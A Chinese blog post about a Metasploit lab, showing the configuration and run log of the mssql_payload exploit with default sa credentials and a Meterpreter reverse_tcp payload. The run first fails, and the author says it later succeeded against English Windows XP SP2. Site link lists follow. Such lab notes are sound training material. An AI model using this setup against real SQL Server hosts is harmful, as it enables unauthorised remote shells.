在kali上做metasploit实验,步骤如下:

msf5 exploit(windows/mssql/mssql_payload) > show options

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description

   ----                 ---------------  --------  -----------

   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)

   PASSWORD             sa               no        The password for the specified username

   RHOSTS               192.168.0.20     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

   RPORT                1433             yes       The target port (TCP)

   SRVHOST              0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0

   SRVPORT              8080             yes       The local port to listen on.

   SSL                  false            no        Negotiate SSL for incoming connections

   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)

   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"

   URIPATH                               no        The URI to use for this exploit (default is random)

   USERNAME             sa               no        The username to authenticate as

   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

   LHOST     192.168.0.22     yes       The listen address (an interface may be specified)

   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Automatic

msf5 exploit(windows/mssql/mssql_payload) > exploit

[*] Started reverse TCP handler on 192.168.0.22:4444

[*] 192.168.0.20:1433 - The server may have xp_cmdshell disabled, trying to enable it...

[*] 192.168.0.20:1433 - Command Stager progress -   1.47% done (1499/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -   2.93% done (2998/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -   4.40% done (4497/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -   5.86% done (5996/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -   7.33% done (7495/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -   8.80% done (8994/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  10.26% done (10493/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  11.73% done (11992/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  13.19% done (13491/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  14.66% done (14990/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  16.13% done (16489/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  17.59% done (17988/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  19.06% done (19487/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  20.53% done (20986/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  21.99% done (22485/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  23.46% done (23984/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  24.92% done (25483/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  26.39% done (26982/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  27.86% done (28481/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  29.32% done (29980/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  30.79% done (31479/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  32.25% done (32978/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  33.72% done (34477/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  35.19% done (35976/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  36.65% done (37475/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  38.12% done (38974/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  39.58% done (40473/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  41.05% done (41972/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  42.52% done (43471/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  43.98% done (44970/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  45.45% done (46469/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  46.91% done (47968/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  48.38% done (49467/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  49.85% done (50966/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  51.31% done (52465/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  52.78% done (53964/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  54.24% done (55463/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  55.71% done (56962/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  57.18% done (58461/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  58.64% done (59960/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  60.11% done (61459/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  61.58% done (62958/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  63.04% done (64457/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  64.51% done (65956/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  65.97% done (67455/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  67.44% done (68954/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  68.91% done (70453/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  70.37% done (71952/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  71.84% done (73451/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  73.30% done (74950/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  74.77% done (76449/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  76.24% done (77948/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  77.70% done (79447/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  79.17% done (80946/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  80.63% done (82445/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  82.10% done (83944/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  83.57% done (85443/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  85.03% done (86942/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  86.50% done (88441/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  87.96% done (89940/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  89.43% done (91439/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  90.90% done (92938/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  92.36% done (94437/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  93.83% done (95936/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  95.29% done (97435/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  96.76% done (98934/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  98.19% done (100400/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  99.59% done (101827/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress - 100.00% done (102246/102246 bytes)

[*] Exploit completed, but no session was created.

msf5 exploit(windows/mssql/mssql_payload) >

让人闹心的是最后一句话

Exploit completed, but no session was created.

三板斧打完,无法返回shell,我尝试了好多方法,更换靶机操作系统,更换metasploit版本,无论怎么折腾都不行,最后从书上找到答案,靶机要使用windows xp sp2英文版本的,重要事情要说三遍“英文版”、“英文版”、“英文版”。
更换完毕后,果然成功返回了shell。至于其他系统,尤其中文版的,我就不知道怎么搞了。

Exploit completed, but no session was created.的更多相关文章

  1. UI自动化执行时报Parent suite setup failed: SessionNotCreatedException: Message: session not created: This version of ChromeDriver only supports Chrome version 81报错的问题解决

    持续集成在执行UI时报错:Parent suite setup failed: SessionNotCreatedException: Message: session not created: Th ...

  2. Selenium chromeDriver启动时报错:session not created: This version of ChromeDriver only supports Chrome

    解决方案: 这是因为ChromeDriver与本地chrome浏览器的版本不一致导致 ChromeDriver下载地址:http://npm.taobao.org/mirrors/chromedriv ...

  3. 渗透杂记-2013-07-13 windows/mssql/mssql_payload

    扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts f ...

  4. 《Metasploit魔鬼训练营》第四章(下)

    p163 XSSF 默认kali 2.0中没有xssf,先下载:https://code.google.com/archive/p/xssf/downloads 将下载下来的zip文件解压,将其中的d ...

  5. 2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用

    实验五 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器 ...

  6. MSF里MS17_010利用模块笔记

    1.   auxiliary/scanner/smb/smb_ms17_010      //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2.     auxilia ...

  7. 使用metasploit进行栈溢出攻击-5

    我们先尝试使用这个脚本进行攻击: msf > use exploit/linux/myvictim msf exploit(myvictim) > set payload linux/x8 ...

  8. MSF系列--MS17_010利用模块笔记

    1.   auxiliary/scanner/smb/smb_ms17_010      //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2.     auxilia ...

  9. 有趣的后渗透工具 Koadic

    koadic是DEFCON黑客大会上分享出来的的一个后渗透工具,虽然和msf有些相似,但是Koadic主要是通过使用Windows ScriptHost(也称为JScript / VBScript)进 ...

随机推荐

  1. spring boot, 容器启动后执行某操作

    常有在spring容器启动后执行某些操作的需求,现做了一个demo的实现,做一下记录,也希望可以给需要的同学提供参考. 1.spring启动后,以新线程执行后续需要的操作,所以执行类实现Runnabl ...

  2. 洛谷 P3627 [APIO2009]抢掠计划 题解

    Analysis 建图+强连通分量+SPFA求最长路 但要保证最后到达的点中包含酒馆 虽然思路并不难想,但要求的代码能力很高. #include<iostream> #include< ...

  3. Jquery tabs

    官网 http://api.jqueryui.com/tabs/ 必须通过了后台验证tab1的信息后才允许进入tab2 var passed=false;          $("#tabs ...

  4. luogu 2152

    SuperGcd 二进制算法 1. A = B, Gcd(A, B) = A; 2. A,B为偶数,  Gcd(A, B) = 2 * Gcd(A / 2, B / 2); 3. A 为偶数, B 为 ...

  5. qml 绘制高精地图之怀疑人生的加载速度

    绘制高精地图时需要gps的经纬度坐标,之前的实现方式是QGeocoordinate类的经纬度变量通过json的方式在qml中使用. 以画线为例,使用方式是这样哒. for(var i in vehic ...

  6. 点击按钮切换内容效果(使用CSS DIV与JavaScript)

    <head><script type="text/javascript">function change_div(id){  if (id == 'gsyw ...

  7. js的新生代垃圾回收

    推荐阅读:https://www.cnblogs.com/chengxs/p/10919311.html 在进行老生代的标记清除法回收以前,还会有一个新生代的垃圾回收算法执行. 新生代和老生代 所谓新 ...

  8. imu 返回的数据

    Cheader: seq: 423038 stamp: secs: 1562058492 nsecs: 992359716 frame_id: imuorientation: x: 0.0026971 ...

  9. OpenFOAM的PISO算法【转载】

    转载自:http://openfoam.blog.sohu.com/94234375.html 流体力学的控制方程是耦合方程组,形式上体现为连续方程和运动方程的耦合,变量上体现为速度和压强的耦合.在数 ...

  10. “可恶”的mariadb

    这是头一次用mariadb,听说是centos7自带的,本来本地用的好好地,今天想连接一下远程centos7主机上的mariadb,结果各种出错,痛不欲生,最后实在买办法只能卸载装mysql啦.稍微记 ...